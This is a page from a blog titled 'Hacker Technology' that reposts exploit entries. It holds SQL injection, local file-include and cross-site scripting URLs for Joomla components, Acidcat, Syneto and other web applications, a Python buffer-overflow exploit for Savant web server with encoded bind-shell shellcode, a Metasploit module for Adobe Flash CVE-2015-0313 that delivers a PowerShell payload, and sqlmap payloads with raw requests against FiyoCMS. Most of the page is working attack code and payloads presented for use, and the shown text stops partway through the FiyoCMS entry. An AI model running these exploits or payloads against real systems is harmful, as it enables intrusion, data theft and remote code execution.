Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863123076

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/51617/info

The 'com_sanpham' component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_sanpham&view=sanpham&kindid=[SQLi]
http://www.example.com/index.php?option=com_sanpham&view=product&task=detail&modelsid=1&cid=[SQLi]
http://www.example.com/index.php?option=com_sanpham&view=product&modelsid=[SQLi]
http://www.example.com/index.php?option=com_sanpham&view=product&markid=1&modelsid=[SQLi]
HireHackking 
source: https://www.securityfocus.com/bid/51616/info

The Full ('com_full') component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_full&dzial=dam_prace&id=[SQLi]
HireHackking 
source: https://www.securityfocus.com/bid/51613/info

The 'com_br' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

http://www.example.com/index.php?option=com_br&controller=../../../../../../../../../../../../../etc/passwd%00
HireHackking 
source: https://www.securityfocus.com/bid/51614/info

Tribiq CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?id=[SQLi]
HireHackking 
source: https://www.securityfocus.com/bid/51608/info

Acidcat ASP CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Acidcat ASP CMS 3.5.1 and 3.5.2 are vulnerable; other versions may also be affected. 

http://www.example.com/admin/admin_colors.asp?"><script>alert('XSS')</script>

http://www.example.com/admin/admin_config.asp?"><script>alert('XSS')</script>

http://www.example.com/admin/admin_cat_add.asp?"><script>alert('XSS')</script>
HireHackking 
source: https://www.securityfocus.com/bid/51607/info

Savant web server is prone to a buffer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Savant web server 3.1 is vulnerable; other versions may also be affected.

#!/usr/bin/python
import socket
 
target_address="10.10.10.129"
target_port=80
 
buffer2 = "R0cX" + "R0cX"
# msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c
buffer2 += ("\xbd\xec\x37\x93\x4b\xdb\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x6a\x83\xc0\x04\x31\x68\x10\x03\x68\x10\x0e\xc2\x4a\xa1\x17"
"\x59\x49\xc2\xff\x91\x58\x90\x5d\x29\xec\xb0\x10\xb1\x92\xd3"
"\xae\x07\xc5\x35\x4d\x38\xf3\xdb\x06\xfc\xec\x5f\xa5\x66\x93"
"\xcc\x5d\x07\x81\xcb\xcc\x59\x35\x45\xd6\x2d\x15\xa1\xe7\xbb"
"\xd6\x5d\x68\x57\x1b\x2a\x4f\xe8\xdd\xd3\xc0\x84\x0c\x0e\xb7"
"\x03\x24\xc7\xfd\xd2\xa5\x88\x89\xf8\x07\x82\x1b\xcb\x2d\x3b"
"\xfd\x9d\x67\xa9\xff\xe9\x20\x9e\xa9\x25\x8b\x7c\xda\xd9\x01"
"\x32\x51\x36\x9a\xe7\x73\x8f\xe5\xea\x60\xa6\x4c\x78\xef\xbb"
"\x1e\x37\xd0\xbd\xaa\x4f\xe7\x94\x3e\x02\x34\x21\xc6\xc1\xe2"
"\xa3\x6f\x76\x92\x9a\xed\xda\x19\x2d\xca\x21\xb2\xb0\xa9\xb5"
"\x72\xa1\xbb\xd0\x18\x64\xd3\xb4\x85\x0c\x92\xf7\x07\xcf\x13"
"\xc2\x95\x57\x0a\x68\x6d\x94\x6f\x5a\xad\xd1\x82\x26\x9f\x3c"
"\x0d\x2b\xdc\x06\x6a\xd3\x87\x24\x9c\x14\x58\x71\x42\xef\x1b"
"\x90\xdc\x46\x67\x51\xd3\x4c\xc4\x11\x23\x29\xbd\xc5\xab\x96"
"\x54\x5e\xb6\x08\x60\x42\x5f\x7a\x76\xdf\x30\x05\x76\xb7\xd1"
"\xf2\x49\xba\x14\x69\xa7\x7b\xa8\x6b\xb9\xad\xc8\x8e\x0f\x9e"
"\x07\x7f\xa7\x89\x9b\x4d\x68\xbd\x45\x77\xe0\x64\xec\xa2\x18"
"\x2d\x6f\x10\xc3\x14\x1d\x4e\x92\x3a\x8a\xf0\xd8\x07\x12\x19"
"\x27\x0c\x23\xe4\x0b\xbb\x6d\x97\xf8\xe8\x8c\x23\xb5\xe0\x22"
"\xe8\x70\x85\x10\xbb\x64\xbe\x09\x41\xe7\x2d\x6d\x39\xfb\xcc"
"\x09\xee\xca\x8f\x83\x22\x5d\x77\x2b\x5b\xc6\x1b\x82\x6e\x17"
"\x03\xe8\x6c\x35\x55\x71\xd4\x35\x72\x12\x3f\x11\x6e\xcf\x09"
"\x5a\xd0\x33\x40\x8e\x3f\x36\xbf\xd7\xd0\x85\x17\x03\xd3\xc4"
"\x7f\x17\x6e\xe8\x0d\xa6\x5f\x9e\xd6\x1b\xf4\x2b\x8c\xb3\xad"
"\x19\xb3\x70\xac\x56\x76\x0c\xfb\x4f\xc4\x99\xdd\x99\x75\x8f"
"\xa8\xfa\x91\x5c\xfb\x26\xbd\x8a\xea\xec\x0d\xf1\x45\x4f\x72"
"\xd1\x02\x47\x9c\xa5\x33\x1e\xf8\xc7\x00\xd2\x3d\x86\xb4\x7c"
"\xb9\x85\x5f\x8c\x40\x58\x7e\x7c\x5d\x76\x3a\xd6\x0b\x9e\xfe"
"\x88\xc7\x60\x56\x99\x19\x7f\x7a\xda\x93\x72\x99\x3f\x69")
 
badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # egghunter searching for R0cX
badbuffer += "\x90" * (254 - len(badbuffer))
badbuffer += "\x09\x1D\x40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETN
httpmethod = "\xb0\x03\x04\x01\x7B\x14" # MOV AL, 3; ADD AL, 1; JPO 14
 
sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2
 
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(sendbuf)
sock.close()
HireHackking 
source: https://www.securityfocus.com/bid/51597/info

Syneto Unified Threat Management is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible.

Unified Threat Management 1.4.2 and 1.3.3 Community Edition are vulnerable; other versions may be affected. 

Proof of Concept:
=================
The vulnerabilities can be exploited by privileged user accounts, lowviewers or remote attackers with required user inter action.
For demonstration or reproduce ...

1.1.1

[+] Reports - Executive Summery - Output Listing Category

<tr id="list_1" class="tableRowEven">
<td class="status" valign="top" align="center">
<a href="#" title="Disable the reporting list" class="disableList"><img src="img/enabled.gif"
title="disable" alt="disable" class="disable"></a>
<a style="display: none;" href="#" title="Enable the reporting list" class="enableList">
<img src="img/disabled.gif" title="enable" alt="enable" class="enable"></a>
				</td>
<td valign="top"> "><EXECUTION OF PERSISTENT SCRIPT CODE!>&#039; <<="" td="">
<td valign="top" nowrap="nowrap">
<a href="#" id="list_1" class="editList"><img src="img/edit.gif" title="Edit" alt="Edit"
 /></a>
<a href="syneto.php?menuid=307&action=delete&id=1" class="deleteList"><
;img src="img/delete.gif" title="Delete" alt="Delete" /></a>
</td>
</tr>
</tbody>
	</table>
	</div>


Reference(s):
https://www.example.com.com/syneto.php?menuid=307



1.1.2
[+] EMail - Filter Add & Configure

<div>Sender = >"<EXECUTION OF PERSISTENT SCRIPT CODE!">.*</div>						    							<div>Receiver = .*</div>
<div>Subject = .*(SPAM|VIAGRA).*</div>
						
Reference(s):
https://www.example.com.com/syneto.php?menuid=63



1.1.3
[+] EMail Settings - New Domain

">
<table class="data" id="smtpDomainsList">
	<thead>
		<tr>
			<th class="status">Status</th>
			<th class="domain">Domain</th>
			<th class="routing">Routing</th>
			<th class="verify_sender">Verify sender</th>
			<th class="qdm">Send digest</th>
			<th class="actions">Actions</th>
		</tr>
	</thead>
	<tbody>

<tr id="domain_3" class="tableRowEven editableDomain "><EXECUTION OF PERSISTENT SCRIPt CODE!><td class="status">
<input name="active" value="1" type="hidden">
<input name="qdm_enabled" value="" type="hidden">
<input name="qdm_hours" value="23" type="hidden">
<input name="admin_email" value=""><script>EXECUTION OF PERSISTENT SCRIPt CODE!</script>" type="hidden">
<input name="verify_peer" value="" type="hidden">
<input name="prefix_digest_links" value="" type="hidden"><EXECUTION OF PERSISTENT SCRIPT CODE!>" />

<input name="verify_sender" value="" type="hidden">
<input name="verify_sender_network_name" value="" type="hidden"><input name="qdm_exceptions" value="" type="hidden">
<input name="whitelist" value="" type="hidden">
<input name="blacklist" value="" type="hidden"><img class="clickable tooltip" title="" src="img/enabled.gif">
</td>
<td class="domain">"><script>alert(vulnerabilitylab)</script></td>


Reference(s):
https://www.example.com.com/syneto.php?menuid=60



1.2

PoC:
https://www.example.com.com/index.php?error=need_login"&#039;><frame src=http://www.vulnerability-lab.com><hr>&from_menu=238
https://www.example.com.com/index.php?info=%3Cimg%20src=%22%3Cimg%20src=search%22/onerror=alert(%22vulnerabilitylab%22)//%22%3E


Reference(s):
https://www.example.com.com/index.php?error=need_login"&#039;>EXECUTION OF PERSISTENT SCRIPT CODE!<hr>&from_menu=238
https://www.example.com.com/index.php?info=<EXECUTION OF PERSISTENT SCRIPT CODE!>%20%3E
HireHackking 
source: https://www.securityfocus.com/bid/51596/info

Snitz Forums 2000 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/forum.asp?TOPIC_ID=[SQL]
HireHackking 
source: https://www.securityfocus.com/bid/51571/info

Vastal EzineShops is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/mag/view_mags.php?cat_id=4â??a
HireHackking 
source: https://www.securityfocus.com/bid/51549/info

OneOrZero AIMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

OneOrZero AIMS 2.8.0 Trial build 231211 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player ByteArray With Workers Use After Free',
      'Description'         => %q{
        This module exploits an use after free vulnerability in Adobe Flash Player. The
        vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
        is freed from an ActionScript worker, who can fill the memory and notify the main
        thread to corrupt the new contents. This module has been tested successfully on
        Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.296.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Unknown', # Vulnerability discovery and exploit in the wild
          'hdarwin', # Public exploit by @hdarwin89 (all the magic)
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-0313'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-02.html'],
          ['URL', 'http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/'],
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2015-0313-the-new-flash-player-zero-day/']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          :flash   => lambda { |ver| ver =~ /^16\./ && ver == '16.0.0.296' },
          :arch    => ARCH_X86
        },
      'Targets'             =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'Feb 02 2015',
      'DefaultTarget'       => 0))
  end

  def exploit
    @swf = create_swf
    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0313', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end

end
HireHackking 
# Exploit Title: FiyoCMS Multiple Vulnerabilities
# Date: 29 March 2015
# Exploit Author: Mahendra
# Vendor Homepage: www.fiyo.org
# Software Link: http://sourceforge.net/projects/fiyo-cms/
# Version: 2.0.1.8, other version might be vulnerable.
# Tested : Kali Linux 1.0.9a-amd64
# CVE(s): CVE-2014-9145,CVE-2014-9146,CVE-2014-9147,CVE-2014-9148

*Advisory Timeline*
30-11-2014: Vendor notified and responded back
01-12-2014: Vulnerabilities provided to vendor
03-14-2015: Vendor released newer version claimed to fix the vulnerabilities
29-03-2015: Advisory released

----------------------------------------------------
FiyoCMS 2.0.1.8 SQL injection, XSS, Direct URL bypass
----------------------------------------------------
*Advisory details*

Several security issues have been identified on the latest FiyoCMS platform.


*Proof of Concept (PoC)*

----------------------------------------------------
Multiple SQL Injection - CVE-2014-9145
----------------------------------------------------

* PoC:

http://192.168.248.132/fiyo/dapur/index.php?app=user&act=edit&id=1[sqli]

* Sqlmap:

Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: app=user&act=edit&id=-7672 UNION ALL SELECT NULL,NULL,CONCAT(0x7171676471,0x66457070464452786c58,0x716a767471),NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: app=user&act=edit&id=1 AND SLEEP(5)

* PoC:

http://192.168.248.132/fiyo/dapur/apps/app_article/controller/article_list.php?cat=[sqli]&user=[sqli]&level=[sqli]&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

* Sqlmap:

Parameter: cat
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=' AND (SELECT 4352 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (4352=4352) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yeEe'='yeEe&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: cat=' UNION ALL SELECT NULL,CONCAT(0x71666f7671,0x4f654364434f746c7477,0x7164687671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: cat=' AND 2332=BENCHMARK(5000000,MD5(0x4a495770)) AND 'RlLS'='RlLS&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

Parameter: level
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=&user=&level=' AND (SELECT 6522 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (6522=6522) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pqqp'='Pqqp&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: cat=&user=&level=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71666f7671,0x6163446a67456e557a48,0x7164687671),NULL,NULL,NULL#&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: cat=&user=&level=' AND 6567=BENCHMARK(5000000,MD5(0x57586864)) AND 'hMLH'='hMLH&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

  
Parameter: user
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=&user=' AND (SELECT 8990 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (8990=8990) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VhKM'='VhKM&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: cat=&user=' UNION ALL SELECT NULL,CONCAT(0x71666f7671,0x4652577247546e6b5241,0x7164687671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: cat=&user=' AND 1262=BENCHMARK(5000000,MD5(0x72797451)) AND 'egJe'='egJe&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913
    
* PoC:
    POST /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/1.1
    Host: 192.168.248.132
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.248.132/fiyo/dapur/index.php?app=user&act=add
    Content-Length: 42
    Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache

    act=email&email=test@asdas.com[sqli]

* Sqlmap:

Parameter: email
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=email&email=test@asdas.com' AND 5514=5514 AND 'KTqH'='KTqH

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: act=email&email=test@asdas.com' AND SLEEP(5) AND 'UjqT'='UjqT

* PoC:

    POST /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/1.1
    Host: 192.168.248.132
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.248.132/fiyo/dapur/index.php?app=user&act=add
    Content-Length: 34
    Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache

    act=user&username=test[sqli]

* Sqlmap:

Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=user&username=test' AND 5514=5514 AND 'KTqH'='KTqH

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
